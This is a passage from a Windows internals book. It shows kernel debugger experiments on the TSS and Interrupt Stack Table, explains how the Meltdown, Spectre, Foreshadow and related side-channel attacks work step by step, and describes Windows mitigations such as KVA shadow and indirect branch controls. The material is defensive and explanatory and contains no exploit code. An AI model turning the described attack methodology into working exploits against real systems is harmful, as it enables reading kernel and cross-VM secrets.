handlers that run on a dedicated kernel stack. As such, only a single TSS is
now used (in the case of Windows, at 040h), which now has an array of eight
possible stack pointers, called the Interrupt Stack Table (IST). Each of the
preceding traps is now associated with an IST Index instead of a custom TSS.
In the next section, as we dump a few IDT entries, you will see the difference
between x86 and x64 systems and their handling of these traps.
EXPERIMENT: Viewing the TSSs on an x86 system
On an x86 system, we can look at the system-wide TSS at 28h by
using the same dg command utilized earlier:
Click here to view code image
kd> dg 28 28
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0028 8116e400 000020ab TSS32 Busy 0 Nb By P Nl 0000008b
This returns the virtual address of the KTSS data structure,
which can then be dumped with the dx or dt commands:
Click here to view code image
kd> dx (nt!_KTSS*)0x8116e400
(nt!_KTSS*)0x8116e400 : 0x8116e400 [Type:
_KTSS *]
[+0x000] Backlink : 0x0 [Type: unsigned short]
[+0x002] Reserved0 : 0x0 [Type: unsigned short]
[+0x004] Esp0 : 0x81174000 [Type: unsigned
long]
[+0x008] Ss0 : 0x10 [Type: unsigned short]
Note that the only fields that are set in the structure are the Esp0
and Ss0 fields because Windows never uses hardware-based task
switching outside of the trap conditions described earlier. As such,
the only use for this particular TSS is to load the appropriate kernel
stack during a hardware interrupt.
As you’ll see in the “Trap dispatching” section, on systems that
do not suffer from the “Meltdown” architectural processor
vulnerability, this stack pointer will be the kernel stack pointer of
the current thread (based on the KTHREAD structure seen in Part
1, Chapter 5), whereas on systems that are vulnerable, this will
point to the transition stack inside of the Processor Descriptor
Area. Meanwhile, the Stack Segment is always set to 10h, or
KGDT_R0_DATA.
Another TSS is used for Machine Check Exceptions (#MC) as
described above. We can use dg to look at it:
Click here to view code image
kd> dg a0 a0
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
00A0 81170590 00000067 TSS32 Avl 0 Nb By P Nl 00000089
This time, however, we’ll use the .tss command instead of dx,
which will format the various fields in the KTSS structure and
display the task as if it were the currently executing thread. In this
case, the input parameter is the task selector (A0h).
Click here to view code image
kd> .tss a0
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000
esi=00000000 edi=00000000
eip=81e1a718 esp=820f5470 ebp=00000000 iopl=0 nv up
di pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00000000
hal!HalpMcaExceptionHandlerWrapper:
81e1a718 fa cli
Note how the segment registers are set up as described in the
“Lazy segment loading” section earlier, and how the program
counter (EIP) is pointing to the handler for #MC. Additionally, the
stack is configured to point to a safe stack in the kernel binary that
should be free from memory corruption. Finally, although not
visible in the .tss output, CR3 is configured to the System Page
Directory. In the “Trap dispatching” section, we revisit this TSS
when using the !idt command.
EXPERIMENT: Viewing the TSS and the IST on an
x64 system
On an x64 system, the dg command unfortunately has a bug that
does not correctly show 64-bit segment base addresses, so
obtaining the TSS segment (40h) base address requires dumping
what appear to be two segments, and combining the high, middle,
and low base address bytes:
Click here to view code image
0: kd> dg 40 48
P Si Gr
Pr Lo
Sel Base Limit Type l ze an
es ng Flags
---- ----------------- ----------------- ---------- - -- --
-- -- --------
0040 00000000`7074d000 00000000`00000067 TSS32 Busy 0 Nb By
P Nl 0000008b
0048 00000000`0000ffff 00000000`0000f802 <Reserved> 0 Nb By
Np Nl 00000000
In this example, the KTSS64 is therefore at
0xFFFFF8027074D000. To showcase yet another way of
obtaining it, note that the KPCR of each processor has a field
called TssBase, which contains a pointer to the KTSS64 as well:
Click here to view code image
0: kd> dx @$pcr->TssBase
@$pcr->TssBase : 0xfffff8027074d000 [Type:
_KTSS64 *]
[+0x000] Reserved0 : 0x0 [Type: unsigned long]
[+0x004] Rsp0 : 0xfffff80270757c90 [Type:
unsigned __int64]
Note how the virtual address is the same as the one visible in the
GDT. Next, you’ll also notice how all the fields are zero except for
RSP0, which, similarly to x86, contains the address of the kernel
stack for the current thread (on systems without the “Meltdown”
hardware vulnerability) or the address of the transition stack in the
Processor Descriptor Area.
On the system on which this experiment was done, a 10th
Generation Intel processor was used; therefore, RSP0 is the current
kernel stack:
Click here to view code image
0: kd> dx @$thread->Tcb.InitialStack
@$thread->Tcb.InitialStack : 0xfffff80270757c90 [Type: void
*]
Finally, by looking at the Interrupt Stack Table, we can see the
various stacks that are associated with the #DF, #MC, #DB, and
NMI traps, and in the Trap Dispatching section, we’ll see how the
Interrupt Dispatch Table (IDT) references these stacks:
Click here to view code image
0: kd> dx @$pcr->TssBase->Ist
@$pcr->TssBase->Ist [Type: unsigned __int64 [8]]
[0] : 0x0 [Type: unsigned __int64]
[1] : 0xfffff80270768000 [Type: unsigned
__int64]
[2] : 0xfffff8027076c000 [Type: unsigned
__int64]
[3] : 0xfffff8027076a000 [Type: unsigned
__int64]
[4] : 0xfffff8027076e000 [Type: unsigned
__int64]
Now that the relationship between ring level, code execution, and some of
the key segments in the GDT has been clarified, we’ll take a look at the
actual transitions that can occur between different code segments (and their
ring level) in the upcoming section on trap dispatching. Before discussing
trap dispatching, however, let’s analyze how the TSS configuration changes
in systems that are vulnerable to the Meltdown hardware side-channels
attack.
Hardware side-channel vulnerabilities
Modern CPUs can compute and move data between their internal registers
very quickly (in the order of pico-seconds). A processor’s registers are a
scarce resource. So, the OS and applications’ code always instruct the CPU to
move data from the CPU registers into the main memory and vice versa.
There are different kinds of memory that are accessible from the main CPU.
Memory located inside the CPU package and accessible directly from the
CPU execution engine is called cache and has the characteristic of being fast
and expensive. Memory that is accessible from the CPU through an external
bus is usually the RAM (Random Access Memory) and has the characteristic
of being slower, cheaper, and big in size. The locality of the memory in
respect to the CPU defines a so-called memory hierarchy based on memories
of different speeds and sizes (the more memory is closer to the CPU, the
more memory is faster and smaller in size). As shown in Figure 8-2, CPUs of
modern computers usually include three different levels of fast cache
memory, which is directly accessible by the execution engine of each
physical core: L1, L2, and L3 cache. L1 and L2 caches are the closest to a
CPU’s core and are private per each core. L3 cache is the farthest one and is
always shared between all CPU’s cores (note that on embedded processors,
the L3 cache usually does not exist).
Figure 8-2 Caches and storage memory of modern CPUs and their average
size and access time.
One of main characteristics of cache is its access time, which is
comparable to CPU’s registers (even though it is still slower). Access time to
the main memory is instead a hundred times slower. This means that in case
the CPU executes all the instructions in order, many times there would be
huge slowdowns due to instructions accessing data located in the main
memory. To overcome this problem, modern CPUs implement various
strategies. Historically, those strategies have led to the discovery of side-
channel attacks (also known as speculative attacks), which have been proven
to be very effective against the overall security of the end-user systems.
To correctly describe side-channel hardware attacks and how Windows
mitigates them, we should discuss some basic concepts regarding how the
CPU works internally.
Out-of-order execution
A modern microprocessor executes machine instructions thanks to its
pipeline. The pipeline contains many stages, including instruction fetch,
decoding, register allocation and renaming, instructions reordering,
execution, and retirement. A common strategy used by the CPUs to bypass
the memory slowdown problem is the capability of their execution engine to
execute instructions out of order as soon as the required resources are
available. This means that the CPU does not execute the instructions in a
strictly sequential order, maximizing the utilization of all the execution units
of the CPU core as exhaustive as possible. A modern processor can execute
hundreds of instructions speculatively before it is certain that those
instructions will be needed and committed (retired).
One problem of the described out-of-order execution regards branch
instructions. A conditional branch instruction defines two possible paths in
the machine code. The correct path to be taken depends on the previously
executed instructions. When calculating the condition depends on previous
instructions that access slow RAM memory, there can be slowdowns. In that
case, the execution engine waits for the retirement of the instructions
defining the conditions (which means waiting for the memory bus to
complete the memory access) before being able to continue in the out-of-
order execution of the following instructions belonging to the correct path. A
similar problem happens in the case of indirect branches. In this case, the
execution engine of the CPU does not know the target of a branch (usually a
jump or a call) because the address must be fetched from the main memory.
In this context, the term speculative execution means that the CPU’s pipeline
decodes and executes multiple instructions in parallel or in an out-of-order
way, but the results are not retired into permanent registers, and memory
writes remain pending until the branch instruction is finally resolved.
The CPU branch predictor
How does the CPU know which branch (path) should be executed before the
branch condition has been completely evaluated? (The issue is similar with
indirect branches, where the target address is not known). The answer lies in
two components located in the CPU package: the branch predictor and the
branch target predictor.
The branch predictor is a complex digital circuit of a CPU that tries to
guess which path a branch will go before it is known definitively. In a similar
way, the branch target predictor is the part of the CPU that tries to predict the
target of indirect branches before it is known. While the actual hardware
implementation heavily depends on the CPU manufacturer, the two
components both use an internal cache called Branch Target Buffer (BTB),
which records the target address of branches (or information about what the
conditional branch has previously done in the past) using an address tag
generated through an indexing function, similar to how the cache generates
the tag, as explained in the next section. The target address is stored in the
BTB the first time a branch instruction is executed. Usually, at the first time,
the execution pipeline is stalled, forcing the CPU to wait for the condition or
target address to be fetched from the main memory. The second time the
same branch is executed, the target address in the BTB is used for fetching
the predicted target into the pipeline. Figure 8-3 shows a simple scheme of an
example branch target predictor.
Figure 8-3 The scheme of a sample CPU branch predictor.
In case the prediction was wrong, and the wrong path was executed
speculatively, then the instruction pipeline is flushed, and the results of the
speculative execution are discarded. The other path is fed into the CPU
pipeline and the execution restarts from the correct branch. This case is
called branch misprediction. The total number of wasted CPU cycles is not
worse than an in-order execution waiting for the result of a branch condition
or indirect address evaluation. However, different side effects of the
speculative execution can still happen in the CPU, like the pollution of the
CPU cache lines. Unfortunately, some of these side effects can be measured
and exploited by attackers, compromising the overall security of the system.
The CPU cache(s)
As introduced in the previous section, the CPU cache is a fast memory that
reduces the time needed for data or instructions fetch and store. Data is
transferred between memory and cache in blocks of fixed sizes (usually 64 or
128 bytes) called lines or cache blocks. When a cache line is copied from
memory into the cache, a cache entry is created. The cache entry will include
the copied data as well as a tag identifying the requested memory location.
Unlike the branch target predictor, the cache is always indexed through
physical addresses (otherwise, it would be complex to deal with multiple
mappings and changes of address spaces). From the cache perspective, a
physical address is split in different parts. Whereas the higher bits usually
represent the tag, the lower bits represent the cache line and the offset into the
line. A tag is used to uniquely identify which memory address the cache
block belongs to, as shown in Figure 8-4.
Figure 8-4 A sample 48-bit one-way CPU cache.
When the CPU reads or writes a location in memory, it first checks for a
corresponding entry in the cache (in any cache lines that might contain data
from that address. Some caches have different ways indeed, as explained
later in this section). If the processor finds that the memory content from that
location is in the cache, a cache hit has occurred, and the processor
immediately reads or writes the data from/in the cache line. Otherwise, a
cache miss has occurred. In this case, the CPU allocates a new entry in the
cache and copies data from main memory before accessing it.
In Figure 8-4, a one-way CPU cache is shown, and it’s capable of
addressing a maximum 48-bits of virtual address space. In the sample, the
CPU is reading 48 bytes of data located at virtual address 0x19F566030. The
memory content is initially read from the main memory into the cache block
0x60. The block is entirely filled, but the requested data is located at offset
0x30. The sample cache has just 256 blocks of 256 bytes, so multiple
physical addresses can fill block number 0x60. The tag (0x19F56) uniquely
identifies the physical address where data is stored in the main memory.
In a similar way, when the CPU is instructed to write some new content to
a memory address, it first updates the cache line(s) that the memory address
belongs to. At some point, the CPU writes the data back to the physical RAM
as well, depending on the caching type (write-back, write-through, uncached,
and so on) applied to the memory page. (Note that this has an important
implication in multiprocessor systems: A cache coherency protocol must be
designed to prevent situations in which another CPU will operate on stale
data after the main CPU has updated a cache block. (Multiple CPU cache
coherency algorithms exist and are not covered in this book.)
To make room for new entries on cache misses, the CPU sometime should
evict one of the existing cache blocks. The algorithm the cache uses to
choose which entry to evict (which means which block will host the new
data) is called the placement policy. If the placement policy can replace only
one block for a particular virtual address, the cache is called direct mapped
(the cache in Figure 8-4 has only one way and is direct mapped). Otherwise,
if the cache is free to choose any entry (with the same block number) to hold
the new data, the cache is called fully associative. Many caches implement a
compromise in which each entry in main memory can go to any one of N
places in the cache and are described as N-ways set associative. A way is
thus a subdivision of a cache, with each way being of equal size and indexed
in the same fashion. Figure 8-5 shows a four-way set associative cache. The
cache in the figure can store data belonging to four different physical
addresses indexing the same cache block (with different tags) in four
different cache sets.
Figure 8-5 A four-way set associative cache.
Side-channel attacks
As discussed in the previous sections, the execution engine of modern CPUs
does not write the result of the computation until the instructions are actually
retired. This means that, although multiple instructions are executed out of
order and do not have any visible architectural effects on CPU registers and
memory, they have microarchitectural side effects, especially on the CPU
cache. At the end of the year 2017, novel attacks were demonstrated against
the CPU out-of-order engines and their branch predictors. These attacks
relied on the fact that microarchitectural side effects can be measured, even
though they are not directly accessible by any software code.
The two most destructive and effective hardware side-channel attacks were
named Meltdown and Spectre.
Meltdown
Meltdown (which has been later called Rogue Data Cache load, or RDCL)
allowed a malicious user-mode process to read all memory, even kernel
memory, when it was not authorized to do so. The attack exploited the out-of-
order execution engine of the processor and an inner race condition between
the memory access and privilege check during a memory access instruction
processing.
In the Meltdown attack, a malicious user-mode process starts by flushing
the entire cache (instructions that do so are callable from user mode). The
process then executes an illegal kernel memory access followed by
instructions that fill the cache in a controlled way (using a probe array). The
process cannot access the kernel memory, so an exception is generated by the
processor. The exception is caught by the application. Otherwise, it would
result in the termination of the process. However, due to the out-of-order
execution, the CPU has already executed (but not retired, meaning that no
architectural effects are observable in any CPU registers or RAM) the
instructions following the illegal memory access that have filled the cache
with the illegally requested kernel memory content.
The malicious application then probes the entire cache by measuring the
time needed to access each page of the array used for filling the CPU cache’s
block. If the access time is behind a certain threshold, the data is in the cache
line, so the attacker can infer the exact byte read from the kernel memory.
Figure 8-6, which is taken from the original Meltdown research paper
(available at the https://meltdownattack.com/ web page), shows the access
time of a 1 MB probe array (composed of 256 4KB pages):
Figure 8-6 CPU time employed for accessing a 1 MB probe array.
Figure 8-6 shows that the access time is similar for each page, except for
one. Assuming that secret data can be read one byte per time and one byte
can have only 256 values, knowing the exact page in the array that led to a
cache hit allows the attacker to know which byte is stored in the kernel
memory.
Spectre
The Spectre attack is similar to Meltdown, meaning that it still relies on the
out-of-order execution flaw explained in the previous section, but the main
CPU components exploited by Spectre are the branch predictor and branch
target predictor. Two variants of the Spectre attack were initially presented.
Both are summarized by three phases:
1.
In the setup phase, from a low-privileged process (which is attacker-
controlled), the attacker performs multiple repetitive operations that
mistrain the CPU branch predictor. The goal is to train the CPU to
execute a (legit) path of a conditional branch or a well-defined target
of an indirect branch.
2.
In the second phase, the attacker forces a victim high-privileged
application (or the same process) to speculatively execute instructions
that are part of a mispredicted branch. Those instructions usually
transfer confidential information from the victim context into a
microarchitectural channel (usually the CPU cache).
3.
In the final phase, from the low-privileged process, the attacker
recovers the sensitive information stored in the CPU cache
(microarchitectural channel) by probing the entire cache (the same
methods employed in the Meltdown attack). This reveals secrets that
should be secured in the victim high-privileged address space.
The first variant of the Spectre attack can recover secrets stored in a victim
process’s address space (which can be the same or different than the address
space that the attacker controls), by forcing the CPU branch predictor to
execute the wrong branch of a conditional branch speculatively. The branch
is usually part of a function that performs a bound check before accessing
some nonsecret data contained in a memory buffer. If the buffer is located
adjacent to some secret data, and if the attacker controls the offset supplied to
the branch condition, she can repetitively train the branch predictor supplying
legal offset values, which satisfies the bound check and allows the CPU to
execute the correct path.
The attacker then prepares in a well-defined way the CPU cache (such that
the size of the memory buffer used for the bound check wouldn’t be in the
cache) and supplies an illegal offset to the function that implements the
bound check branch. The CPU branch predictor is trained to always follow
the initial legit path. However, this time, the path would be wrong (the other
should be taken). The instructions accessing the memory buffer are thus
speculatively executed and result in a read outside the boundaries, which
targets the secret data. The attacker can thus read back the secrets by probing
the entire cache (similar to the Meltdown attack).
The second variant of Spectre exploits the CPU branch target predictor;
indirect branches can be poisoned by an attacker. The mispredicted path of
an indirect branch can be used to read arbitrary memory of a victim process
(or the OS kernel) from an attacker-controlled context. As shown in Figure 8-
7, for variant 2, the attacker mistrains the branch predictor with malicious
destinations, allowing the CPU to build enough information in the BTB to
speculatively execute instructions located at an address chosen by the
attacker. In the victim address space, that address should point to a gadget.
A gadget is a group of instructions that access a secret and store it in a buffer
that is cached in a controlled way (the attacker needs to indirectly control the
content of one or more CPU registers in the victim, which is a common case
when an API accepts untrusted input data).
Figure 8-7 A scheme of Spectre attack Variant 2.
After the attacker has trained the branch target predictor, she flushes the
CPU cache and invokes a service provided by the target higher-privileged
entity (a process or the OS kernel). The code that implements the service
must implement similar indirect branches as the attacker-controlled process.
The CPU branch target predictor in this case speculatively executes the
gadget located at the wrong target address. This, as for Variant 1 and
Meltdown, creates microarchitectural side effects in the CPU cache, which
can be read from the low-privileged context.
Other side-channel attacks
After Spectre and Meltdown attacks were originally publicly released,
multiple similar side-channel hardware attacks were discovered. Even though
they were less destructive and effective compared to Meltdown and Spectre,
it is important to at least understand the overall methodology of those new
side-channel attacks.
Speculative store bypass (SSB) arises due to a CPU optimization that can
allow a load instruction, which the CPU evaluated not to be dependent on a
previous store, to be speculatively executed before the results of the store are
retired. If the prediction is not correct, this can result in the load operation
reading stale data, which can potentially store secrets. The data can be
forwarded to other operations executed during speculation. Those operations
can access memory and generate microarchitectural side effects (usually in
the CPU cache). An attacker can thus measure the side effects and recover
the secret value.
The Foreshadow (also known as L1TF) is a more severe attack that was
originally designed for stealing secrets from a hardware enclave (SGX) and
then generalized also for normal user-mode software executing in a non-
privileged context. Foreshadow exploited two hardware flaws of the
speculative execution engine of modern CPUs. In particular:
■ Speculation on inaccessible virtual memory. In this scenario, when
the CPU accesses some data stored at a virtual address described by a
Page table entry (PTE) that does not include the present bit (meaning
that the address is is not valid) an exception is correctly generated.
However, if the entry contains a valid address translation, the CPU
can speculatively execute the instructions that depend on the read
data. As for all the other side-channel attacks, those instructions are
not retired by the processor, but they produce measurable side effects.
In this scenario, a user-mode application would be able to read secret
data stored in kernel memory. More seriously, the application, under
certain circumstances, would also be able to read data belonging to
another virtual machine: when the CPU encounters a nonpresent entry
in the Second Level Address Translation table (SLAT) while
translating a guest physical address (GPA), the same side effects can
happen. (More information on the SLAT, GPAs, and translation
mechanisms are present in Chapter 5 of Part 1 and in Chapter 9,
“Virtualization technologies”).
■ Speculation on the logical (hyper-threaded) processors of a CPU’s
core. Modern CPUs can have more than one execution pipeline per
physical core, which can execute in an out-of-order way multiple
instruction streams using a single shared execution engine (this is
Symmetric multithreading, or SMT, as explained later in Chapter 9.)
In those processors, two logical processors (LPs) share a single cache.
Thus, while an LP is executing some code in a high-privileged
context, the other sibling LP can read the side effects produced by the
high-privileged code executed by the other LP. This has very severe
effects on the global security posture of a system. Similar to the first
Foreshadow variant, an LP executing the attacker code on a low-
privileged context can even spoil secrets stored in another high-
security virtual-machine just by waiting for the virtual machine code
that will be scheduled for execution by the sibling LP. This variant of
Foreshadow is part of the Group 4 vulnerabilities.
Microarchitectural side effects are not always targeting the CPU cache.
Intel CPUs use other intermediate high-speed buffers with the goal to better
access cached and noncached memory and reorder micro-instructions.
(Describing all those buffers is outside the scope of this book.) The
Microarchitectural Data Sampling (MDS) group of attacks exposes secrets
data located in the following microarchitectural structures:
■ Store buffers While performing store operations, processors write
data into an internal temporary microarchitectural structure called
store buffer, enabling the CPU to continue to execute instructions
before the data is actually written in the cache or main memory (for
noncached memory access). When a load operation reads data from
the same memory address as an earlier store, the processor may be
able to forward data directly from the store buffer.
■ Fill buffers A fill buffer is an internal processor structure used to
gather (or write) data on a first level data cache miss (and on I/O or
special registers operations). Fill buffers are the intermediary between
the CPU cache and the CPU out-of-order execution engine. They may
retain data from prior memory requests, which may be speculatively
forwarded to a load operation.
■ Load ports Load ports are temporary internal CPU structures used to
perform load operations from memory or I/O ports.
Microarchitectural buffers usually belong to a single CPU core and are
shared between SMT threads. This implies that, even if attacks on those
structures are hard to achieve in a reliable way, the speculative extraction of
secret data stored into them is also potentially possible across SMT threads
(under specific conditions).
In general, the outcome of all the hardware side-channel vulnerabilities is
the same: secrets will be spoiled from the victim address space. Windows
implements various mitigations for protecting against Spectre, Meltdown,
and almost all the described side-channel attacks.
Side-channel mitigations in Windows
This section takes a peek at how Windows implements various mitigations
for defending against side-channel attacks. In general, some side-channel
mitigations are implemented by CPU manufacturers through microcode
updates. Not all of them are always available, though; some mitigations need
to be enabled by the software (Windows kernel).
KVA Shadow
Kernel virtual address shadowing, also known as KVA shadow (or KPTI in
the Linux world, which stands for Kernel Page Table Isolation) mitigates the
Meltdown attack by creating a distinct separation between the kernel and user
page tables. Speculative execution allows the CPU to spoil kernel data when
the processor is not at the correct privilege level to access it, but it requires
that a valid page frame number be present in the page table translating the
target kernel page. The kernel memory targeted by the Meltdown attack is
generally translated by a valid leaf entry in the system page table, which
indicates only supervisor privilege level is allowed. (Page tables and virtual
address translation are covered in Chapter 5 of Part 1.) When KVA shadow is
enabled, the system allocates and uses two top-level page tables for each
process:
■ The kernel page tables map the entire process address space,
including kernel and user pages. In Windows, user pages are mapped
as nonexecutable to prevent kernel code to execute memory allocated
in user mode (an effect similar to the one brought by the hardware
SMEP feature).
■ The User page tables (also called shadow page tables) map only user
pages and a minimal set of kernel pages, which do not contain any
sort of secrets and are used to provide a minimal functionality for
switching page tables, kernel stacks, and to handle interrupts, system
calls, and other transitions and traps. This set of kernel pages is called
transition address space.
In the transition address space, the NT kernel usually maps a data structure
included in the processor’s PRCB, called
KPROCESSOR_DESCRIPTOR_AREA, which includes data that needs to
be shared between the user (or shadow) and kernel page tables, like the
processor’s TSS, GDT, and a copy of the kernel mode GS segment base
address. Furthermore, the transition address space includes all the shadow
trap handlers located in the “.KVASCODE” section of the NT Kernel image.
A system with KVA shadow enabled runs unprivileged user-mode threads
(i.e., running without Administrator-level privileges) in processes that do not
have mapped any kernel page that may contain secrets. The Meltdown attack
is not effective anymore; kernel pages are not mapped as valid in the
process’s page table, and any sort of speculation in the CPU targeting those
pages simply cannot happen. When the user process invokes a system call, or
when an interrupt happens while the CPU is executing code in the user-mode
process, the CPU builds a trap frame on a transition stack, which, as
specified before, is mapped in both the user and kernel page tables. The CPU
then executes the code of the shadow trap handler that handles the interrupt
or system call. The latter normally switches to the kernel page tables, copies
the trap frame on the kernel stack, and then jumps to the original trap handler
(this implies that a well-defined algorithm for flushing stale entries in the
TLB must be properly implemented. The TLB flushing algorithm is
described later in this section.) The original trap handler is executed with the
entire address space mapped.
Initialization
The NT kernel determines whether the CPU is susceptible to Meltdown
attack early in phase -1 of its initialization, after the processor feature bits are
calculated, using the internal KiDetectKvaLeakage routine. The latter obtains
processor’s information and sets the internal KiKvaLeakage variable to 1 for
all Intel processors except Atoms (which are in-order processors).
In case the internal KiKvaLeakage variable is set, KVA shadowing is
enabled by the system via the KiEnableKvaShadowing routine, which
prepares the processor’s TSS (Task State Segment) and transition stacks. The
RSP0 (kernel) and IST stacks of the processor’s TSS are set to point to the
proper transition stacks. Transition stacks (which are 512 bytes in size) are
prepared by writing a small data structure, called KIST_BASE_FRAME on
the base of the stack. The data structure allows the transition stack to be
linked against its nontransition kernel stack (accessible only after the page
tables have been switched), as illustrated by Figure 8-8. Note that the data
structure is not needed for the regular non-IST kernel stacks. The OS obtains
all the needed data for the user-to-kernel switch from the CPU’s PRCB. Each
thread has a proper kernel stack. The scheduler set a kernel stack as active by
linking it in the processor PRCB when a new thread is selected to be
executed. This is a key difference compared to the IST stacks, which exist as
one per processor.
Figure 8-8 Configuration of the CPU’s Task State Segment (TSS) when
KVA shadowing is active.
The KiEnableKvaShadowing routine also has the important duty of
determining the proper TLB flush algorithm (explained later in this section).
The result of the determination (global entries or PCIDs) is stored in the
global KiKvaShadowMode variable. Finally, for non-boot processors, the
routine invokes KiShadowProcessorAllocation, which maps the per-
processor shared data structures in the shadow page tables. For the BSP
processor, the mapping is performed later in phase 1, after the SYSTEM
process and its shadow page tables are created (and the IRQL is dropped to
passive level). The shadow trap handlers are mapped in the user page tables
only in this case (they are global and not per-processor specific).
Shadow page tables
Shadow (or user) page tables are allocated by the memory manager using the
internal MiAllocateProcessShadow routine only when a process’s address
space is being created. The shadow page tables for the new process are
initially created empty. The memory manager then copies all the kernel
shadow top-level page table entries of the SYSTEM process in the new
process shadow page table. This allows the OS to quickly map the entire
transition address space (which lives in kernel and is shared between all user-
mode processes) in the new process. For the SYSTEM process, the shadow
page tables remain empty. As introduced in the previous section, they will be
filled thanks to the KiShadowProcessorAllocation routine, which uses
memory manager services to map individual chunks of memory in the
shadow page tables and to rebuild the entire page hierarchy.
The shadow page tables are updated by the memory manager only in
specific cases. Only the kernel can write in the process page tables to map or
unmap chunks of memory. When a request to allocate or map new memory
into a user process address space, it may happen that the top-level page table
entry for a particular address would be missing. In this case, the memory
manager allocates all the pages for the entire page-table hierarchy and stores
the new top-level PTE in the kernel page tables. However, in case KVA
shadow is enabled, this is not enough; the memory manager must also write
the top-level PTE on the shadow page table. Otherwise, the address will be
not present in the user-mapping after the trap handler correctly switches the
page tables before returning to user mode.
Kernel addresses are mapped in a different way in the transition address
space compared to the kernel page tables. To prevent false sharing of
addresses close to the chunk of memory being mapped in the transition
address space, the memory manager always recreates the page table
hierarchy mapping for the PTE(s) being shared. This implies that every time
the kernel needs to map some new pages in the transition address space of a
process, it must replicate the mapping in all the processes’ shadow page
tables (the internal MiCopyTopLevelMappings routine performs exactly this
operation).
TLB flushing algorithm
In the x86 architecture, switching page tables usually results in the flushing
of the current processor’s TLB (translation look-aside buffer). The TLB is a
cache used by the processor to quickly translate the virtual addresses that are
used while executing code or accessing data. A valid entry in the TLB allows
the processor to avoid consulting the page tables chain, making execution
faster. In systems without KVA shadow, the entries in the TLB that translate
kernel addresses do not need to be explicitly flushed: in Windows, the kernel
address space is mostly unique and shared between all processes. Intel and
AMD introduced different techniques to avoid flushing kernel entries on
every page table switching, like the global/non-global bit and the Process-
Context Identifiers (PCIDs). The TLB and its flushing methodologies are
described in detail in the Intel and AMD architecture manuals and are not
further discussed in this book.
Using the new CPU features, the operating system is able to only flush
user entries and keep performance fast. This is clearly not acceptable in KVA
shadow scenarios where a thread is obligated to switch page tables even
when entering or exiting the kernel. In systems with KVA enabled, Windows
employs an algorithm able to explicitly flush kernel and user TLB entries
only when needed, achieving the following two goals:
■ No valid kernel entries will be ever maintained in the TLB when
executing a thread user-code. Otherwise, this could be leveraged by
an attacker with the same speculation techniques used in Meltdown,
which could lead her to read secret kernel data.
■ Only the minimum amount of TLB entries will be flushed when
switching page tables. This will keep the performance degradation
introduced by KVA shadowing acceptable.
The TLB flushing algorithm is implemented in mainly three scenarios:
context switch, trap entry, and trap exit. It can run on a system that either
supports only the global/non-global bit or also PCIDs. In the former case,
differently from the non-KVA shadow configurations, all the kernel pages
are labeled as non-global, whereas the transition and user pages are labeled
as global. Global pages are not flushed while a page table switch happens
(the system changes the value of the CR3 register). Systems with PCID
support labels kernel pages with PCID 2, whereas user pages are labelled
with PCID 1. The global and non-global bits are ignored in this case.
When the current-executing thread ends its quantum, a context switch is
initialized. When the kernel schedules execution for a thread belonging to
another process address space, the TLB algorithm assures that all the user
pages are removed from the TLB (which means that in systems with
global/non-global bit a full TLB flush is needed. User pages are indeed
marked as global). On kernel trap exits (when the kernel finishes code
execution and returns to user mode) the algorithm assures that all the kernel
entries are removed (or invalidated) from the TLB. This is easily achievable:
on processors with global/non-global bit support, just a reload of the page
tables forces the processor to invalidate all the non-global pages, whereas on
systems with PCID support, the user-page tables are reloaded using the User
PCID, which automatically invalidates all the stale kernel TLB entries.
The strategy allows kernel trap entries, which can happen when an
interrupt is generated while the system was executing user code or when a
thread invokes a system call, not to invalidate anything in the TLB. A
scheme of the described TLB flushing algorithm is represented in Table 8-1.
Table 8-1 KVA shadowing TLB flushing strategies
Configuration Type
User
Pages
Kernel
Pages
Transition
Pages
KVA shadowing disabled
Non-
global
Global
N / D
KVA shadowing enabled,
PCID strategy
PCID 1,
non-global
PCID 2,
non-global
PCID 1,
non-global
KVA shadowing enabled,
global/non-global strategy
Global
Non-
global
Global
Hardware indirect branch controls (IBRS, IBPB,
STIBP, SSBD)
Processor manufacturers have designed hardware mitigations for various
side-channel attacks. Those mitigations have been designed to be used with
the software ones. The hardware mitigations for side-channel attacks are
mainly implemented in the following indirect branch controls mechanisms,
which are usually exposed through a bit in CPU model-specific registers
(MSR):
■ Indirect Branch Restricted Speculation (IBRS) completely disables
the branch predictor (and clears the branch predictor buffer) on
switches to a different security context (user vs kernel mode or VM
root vs VM non-root). If the OS sets IBRS after a transition to a more
privileged mode, predicted targets of indirect branches cannot be
controlled by software that was executed in a less privileged mode.
Additionally, when IBRS is on, the predicted targets of indirect
branches cannot be controlled by another logical processor. The OS
usually sets IBRS to 1 and keeps it on until it returns to a less
privileged security context.
The implementation of IBRS depends on the CPU manufacturer:
some CPUs completely disable branch predictors buffers when IBRS
is set to on (describing an inhibit behavior), while some others just
flush the predictor’s buffers (describing a flush behavior). In those
CPUs the IBRS mitigation control works in a very similar way to
IBPB, so usually the CPU implement only IBRS.
■ Indirect Branch Predictor Barrier (IBPB) flushes the content of the
branch predictors when it is set to 1, creating a barrier that prevents
software that executed previously from controlling the predicted
targets of indirect branches on the same logical processor.
■ Single Thread Indirect Branch Predictors (STIBP) restricts the
sharing of branch prediction between logical processors on a physical
CPU core. Setting STIBP to 1 on a logical processor prevents the
predicted targets of indirect branches on a current executing logical
processor from being controlled by software that executes (or
executed previously) on another logical processor of the same core.
■ Speculative Store Bypass Disable (SSBD) instructs the processor to
not speculatively execute loads until the addresses of all older stores
are known. This ensures that a load operation does not speculatively
consume stale data values due to bypassing an older store on the same
logical processor, thus protecting against Speculative Store Bypass
attack (described earlier in the “Other side-channel attacks” section).
The NT kernel employs a complex algorithm to determine the value of the
described indirect branch controls, which usually changes in the same
scenarios described for KVA shadowing: context switches, trap entries, and
trap exits. On compatible systems, the system runs kernel code with IBRS
always on (except when Retpoline is enabled). When no IBRS is available
(but IBPB and STIBP are supported), the kernel runs with STIBP on,
flushing the branch predictor buffers (with an IBPB) on every trap entry (in
that way the branch predictor can’t be influenced by code running in user
mode or by a sibling thread running in another security context). SSBD,
when supported by the CPU, is always enabled in kernel mode.
For performance reasons, user-mode threads are generally executed with
no hardware speculation mitigations enabled or just with STIBP on
(depending on STIBP pairing being enabled, as explained in the next
section). The protection against Speculative Store Bypass must be manually
enabled if needed through the global or per-process Speculation feature.
Indeed, all the speculation mitigations can be fine-tuned through the global
